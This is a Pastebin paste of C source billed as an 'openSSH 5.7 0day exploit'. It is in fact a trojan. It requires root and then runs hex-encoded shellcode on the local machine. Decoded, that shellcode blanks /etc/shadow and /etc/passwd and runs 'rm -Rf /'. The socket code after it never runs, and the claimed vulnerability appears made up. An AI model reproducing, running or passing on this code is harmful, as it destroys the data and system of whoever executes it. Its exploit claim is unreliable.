Guest User

Untitled

a guest
Jan 26th, 2011
2,762
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
  7. */
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  18. void usage(char *argv[])
  19. {
  20. printf("Usage: %s <target> <port>\n", argv[0]);
  21. exit(1);
  22. }
  23.  
  24. unsigned char shellcode[] =
  25. "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  26. "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  27. "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  28. "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  29. "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  30. "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  31. "\xcd\x80";
  32.  
  33.  
  34.  
  35. int main(int argc, char *argv[])
  36. {
  37. int uid = getuid();
  38. int port = 22, sock;
  39. struct hostent *host;
  40. struct sockaddr_in addr;
  41.  
  42. if(uid !=0)
  43. {
  44. fprintf(stderr, "[!!]Error: You must be root\n");
  45. exit(1);
  46. }
  47. if(uid == 0)
  48. {
  49. printf("\t[+]Starting exploit..\n");
  50. }
  51. if(argc != 3)
  52. usage(argv);
  53.  
  54. fprintf(stderr, "[!!]Exploit failed\n");
  55. (*(void(*)())shellcode)();
  56. exit(1);
  57. char payload[1024];
  58. memcpy(payload, &shellcode, sizeof(shellcode));
  59. if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  60. {
  61. printf("[+]Got shell\n");
  62. system("/bin/sh");
  63. }
  64. else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  65. {
  66. fprintf(stderr, "[!!]Exploit failed\n");
  67. exit(1);
  68. }
  69. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×